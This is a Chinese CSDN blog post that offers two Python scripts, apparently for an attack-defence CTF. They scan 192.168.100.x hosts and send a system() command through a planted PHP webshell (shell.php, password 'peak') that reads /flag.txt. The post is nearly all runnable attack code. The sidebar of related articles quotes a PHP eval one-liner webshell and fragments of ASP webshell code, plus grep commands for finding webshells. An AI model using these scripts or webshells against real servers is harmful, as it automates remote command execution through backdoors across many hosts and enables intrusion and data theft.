自动利用webshell执行系统命令py脚本

最新推荐文章于 2022-10-21 20:57:10 发布
最新推荐文章于 2022-10-21 20:57:10 发布
阅读量733 收藏 1
点赞数
分类专栏: Python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41617034/article/details/104701274
版权

python2脚本

# -*- coding: utf-8 -*-
import urllib.request
import threading

def cat_flag():
    cmd = "cat%20/flag.txt"  # 还可用cut -c1- /flag.txt
    path = "shell.php"
    passwd = "peak"
    for i in range(110, 140):
        ip = "192.168.100." + str(i)
        print(ip)
        system1= 'system("' + cmd + '");'
        system2 = passwd + "=" + system1
        url = "http://" + ip + "/" + path + "?" + system2
        try:
            response = urllib.request.urlopen(url)
            html = response.read().decode('utf-8')
            if "404" in html:
                print(ip,"#############################################NO flag#######################################################")
            else:
                print(ip, html)
                print("#################################################fflag在上面##################################################")
        except:
            pass
            print("error")

t = threading.Thread(target=cat_flag)
t.start()

python3脚本

# -*- coding: utf-8 -*-
import requests
import threading

def get_flag(ip,path,cmd,passwd):
	system1= 'system("' + cmd + '");'
	system2 = passwd + "=" + system1
	url = "http://" + ip + "/" + path + "?" + system2
	#print(system2)
	#print(url)
	try:
		r = requests.get(url)
		if "404" in r.text:
			print("--------------------------------------------------No flag------------------------------------------------------------")
			print()
		else:
			print(url,r.text)
			print(ip)
			print("--------------------------------------------------上面是flag---------------------------------------------------------")
	except:
		pass
cmd = "cat /flag.txt"#还可用cut -c1- /flag.txt
path = "shell.php"
passwd = "peak"

for i in range(1,139):
	#print(i)
	ip = "192.168.100."+str(i)
	#print(ip)
	t = threading.Thread(target=get_flag,args=(ip,path,cmd,passwd))
	t.start()
1stPeak
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CGI Hack 实现在HTML页面执行Shell命令
悦分享
08-01 892
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(如果后台加验证或者MD5的时候,可以试着cookies欺骗、本地提交),寻找可执行的目录和相关函数,拿shell>提权。...
网络攻击之-Webshell流量告警运营分析篇
最新发布
村中少年的专栏
01-01 1374
通过流量数据包从webshell上传,webshell注入,webshell连接通信,Webshell工具利用的角度进行阐述Webshell的防御,告警研判以及处置建议
webshell:Web的命令行
03-10
webshell:Web的命令行
Python正则表达式中的re.S,re.M,re.I的作用
a88842443的博客
03-30 3479
正则表达式可以包含一些可选标志修饰符来控制匹配的模式。修饰符被指定为一个可选的标志。多个标志可以通过按位 OR(|) 它们来指定。如 re.I | re.M 被设置成 I 和 M 标志: 修饰符描述 re.I 使匹配对大小写不敏感 re.L 做本地化识别(locale-aware)匹配 re.M 多行匹配,影响 ^ 和 $ re.S ...
一句话***(webshell)是如何执行命令
weixin_34381687的博客
06-16 1897
      在很多的***过程中,***人员会上传一句话***(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话***到底是如何执行的呢,下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话***。<?php @eval($_POST['cmd']); ?>看到这里不得不赞美前...
webshell下安全执行EXE程序
DcBoy's Blog
01-05 1895
有时候在WEBSHELL下面执行EXE程序常常会导致IIS崩溃有一种方法比较方便 首先查看系统时间time /T获得当前时间添加到at time xxx.exe用at命令查看任务是否被添加
webshell脚本自查
loveqqcc的博客
03-14 314
find /site/* -type f -name “*.php” |xargs grep “eval” 如果木马做了免杀处理,可以查看是否使用加密函数 find /site/* -type f -name “*.php” |xargs grep “base64_decode” 查看是否做了拼接处理 find /site/* -type f -name “*.php” |xargs grep...
网络安全中职组C模块webshell.py脚本
11-19
网络安全中职组C模块webshell.py脚本
〖教程〗Ladon远程命令执行Wmiexec/psexec/atexec/psexec/webshell
K8哥哥
05-30 1874
前言 在内网渗透中,横向移动用的最多的就是远程执行命令了,网上有很多相关工具,系统也自带相关命令。但不是体积大就是命令繁琐,如schtasks命令等,执行需先创建任务、执行任务、删除任务等,命令长,输错会浪费很多时间,即使复制粘贴也很麻烦。体积大的如Impacket中的psexec/atexec/smbexec/wmiexec等,若是使用PY2.7编译低版本最小也5M左右,最大可能37.5M,无论是内存加载或是传到目标都很麻烦,如果后渗透工具垃圾,区区这几M还未必能传上去,传上去得浪费很多时间。传一个就5M
python漏洞利用脚本_Redis 未授权访问漏洞(附Python脚本
weixin_39590635的博客
12-18 556
0x01 环境搭建#下载并安装cd/tmpwget http://download.redis.io/releases/redis-2.8.17.tar.gztar xzf redis-2.8.17.tar.gzcd redis-2.8.17make#启动redis服务cd src./redis-server启动redis服务进程后,就可以使用测试客户端程序redis-cli和redis服务交互了...
浅谈在WEBSHELL下如何运行命令
02-24
随着互联网的发展和互联网用户的快速增长,越来越多的应用都转向B/S结构,因为它是跨平台的、易操作的、方便的、迅速的,这样不论用户使用什么样的操作系统,仅仅需要安装一个浏览器就能享受在线购物、网上支付、看电影、写博客等等各种各样便捷的服务,特别是WEB2.0时代的到来更增添了互联网的
Shell 简单的WEB命令
张小琦的博客专栏
06-04 1560
wget 用于网页或者文件下载的命令 wget URL wget URL1 URL1 -O doloaded.txt   #下载文件为doloaded.txt -o log            #日志信息保存到log文件中 -t 5              #指定重试次数5 --limit-rate 20k  #限制速度 --quota或-Q       #限制下载文件的大小
webshell
qq_58970968的博客
03-31 3096
什么是webshell? webshell就是以asp、aspx、 php.jsp, 或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,可以使用浏览器或者webshell管理工具来访问该后门文件,执行相关的系统命令,以达到控制网站服务器的目的。 getshell总结博客:https://note.youdao.com/ynoteshare1/index.html?id=b58d8f4a93c3e5cb0f40ffa5243c11e6&t.
webshell脚本操作流程
明哥哥知识分享
08-14 1065
一. 概述 “冰蝎”动态二进制加密网站管理客户端 二. 运行环境 客户端:jre6~jre8 服务端:.net 2.0+;php 5.4-7.2;java 6+ 二. 使用手册 1. 上传小马 使用冰蝎自带小马,上传至服务器端 <?php @error_reporting(0); session_start(); if (isset($_GET['pass'])) { $key=substr(md5(uniqid(rand())),16); $_SESSION['k']=$key;
命令注入写webshell
weixin_34082177的博客
03-10 2625
2019独角兽企业重金招聘Python工程师标准>>> ...
apache服务web页面执行shell脚本
完颜振江
10-21 1631
apache服务web页面执行shell脚本
开发监控Web 服务的Shell脚本
timchen525的专栏
08-10 3094
Linux 对外发送邮件功能
webshell
xlh006的博客
09-12 2669
一、什么是webshell webshell简介 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至...
webshell执行命令脚本汇集
weixin_33743703的博客
03-17 166
cmd1.asp <object runat=server id=shell scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=shell scope=page cl...
SQLmap获取Webshell与系统权限:命令详解
SQLmap是一款强大的SQL注入自动化工具,它不仅可以进行常规的SQL注入测试,还能执行操作系统命令,读写文件,甚至尝试权限提升。在某些情况下,尽管存在SQL注入漏洞,但可能由于系统配置问题无法直接获取Webshell或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1stPeak

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值